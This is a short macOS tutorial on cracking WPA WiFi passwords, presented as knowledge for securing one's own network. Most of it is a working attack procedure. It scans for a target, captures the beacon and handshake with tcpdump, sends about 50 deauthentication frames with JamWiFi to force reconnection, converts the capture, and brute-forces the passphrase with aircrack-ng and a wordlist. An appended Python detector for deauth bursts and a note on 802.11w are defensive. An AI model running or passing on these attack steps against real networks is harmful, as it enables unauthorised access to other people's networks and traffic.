Secure your network by knowing how someone may hack your WiFi with macOS.
Cracking WiFi with macOS
- Install Homebrew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
- Install cap2hccapx from JamWiFi
gcc -o cap2hccapx cap2hccapx.c
sudo mv cap2hccapx /usr/local/bin/cap2hccapx
- Run make in the src folder of hashcat-utils and copy cap2hccapx.bin to your working directory.
- Install aircrack-ng
brew install aircrack-ng
- Add aircrack-ng to path
- Add airport to path
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
- Open JamWiFi. Press Scan.
- Choose the target. The closer the RSSI is to zero, the better the signal (e.g. -54 is better than -74).
- Copy the BSSID and CHANNEL of the selected target Access Point. (In the commands below, replace $BSSID, $CHANNEL and anything between <>, with the <> characters included, with the correct data.)
- Disconnect from the WiFi network you are connected to, without disabling WiFi, and set the channel. Use
sudo airport -z
sudo airport -c$CHANNEL
- Capture the beacon
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en0 -w beacon.cap
- Capture handshake
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap
- In JamWiFi, choose the target and press Deauth, press Monitor, wait for some packets to load, and then press "Do it!". When you get ~50 deauths, press Done.
- Press CTRL+C in the Terminal to stop capturing the handshake.
- Merge the Beacon and Handshake
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
- Convert cap to hccapx
cap2hccapx capture.cap capture.hccapx
- If it says 'Written 0 WPA Handshakes to: capture.hccapx', try again to capture.
- Start the brute force with a wordlist. Replace <wordlist> with the path to your wordlist file.
aircrack-ng -1 -a 1 -b $BSSID capture.hccapx -w <wordlist>
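The Deauth step above produces a burst of roughly 50 deauthentication frames, which is something you can watch for on your own network. The following is an added example, not part of the original page: it flags any BSSID that sends an unusual number of deauth frames in a short window. The record format, the 10-second window and the threshold of 20 are assumptions, and the sample records are constructed.

```python
from collections import defaultdict, deque

# Constructed sample records (not real capture output), one frame per line:
#   "<epoch_seconds> <bssid> <destination> <subtype>"
SAMPLE = (
    [
        "1700000000.0 02:00:00:00:00:01 ff:ff:ff:ff:ff:ff beacon",
        # A single deauth is normal (roaming, AP restart) and must not alert.
        "1700000001.0 02:00:00:00:00:02 02:00:00:00:00:aa deauth",
    ]
    # 50 deauth frames in about 5 seconds, as in the Deauth step above.
    + [
        f"{1700000005 + i * 0.1:.1f} 02:00:00:00:00:01 ff:ff:ff:ff:ff:ff deauth"
        for i in range(50)
    ]
    + ["truncated record"]  # malformed input is skipped, not fatal
)


def deauth_bursts(lines, window=10.0, threshold=20):
    """Return {bssid: peak deauth count seen in any `window`-second span}
    for every BSSID whose peak reaches `threshold`."""
    recent = defaultdict(deque)  # bssid -> timestamps still inside the window
    peak = defaultdict(int)      # bssid -> highest count observed so far
    for line in lines:
        try:
            ts, bssid, _dest, subtype = line.split()
            ts = float(ts)
        except ValueError:
            continue  # wrong field count or non-numeric timestamp
        if subtype != "deauth":
            continue
        q = recent[bssid.lower()]
        q.append(ts)
        # Drop timestamps that have fallen out of the sliding window.
        while q and ts - q[0] > window:
            q.popleft()
        peak[bssid.lower()] = max(peak[bssid.lower()], len(q))
    return {b: n for b, n in peak.items() if n >= threshold}


if __name__ == "__main__":
    for bssid, count in deauth_bursts(SAMPLE).items():
        print(f"ALERT {bssid}: {count} deauth frames within 10 s")
```

Where the access point and clients support 802.11w (Protected Management Frames), enabling it makes clients ignore forged deauthentication frames.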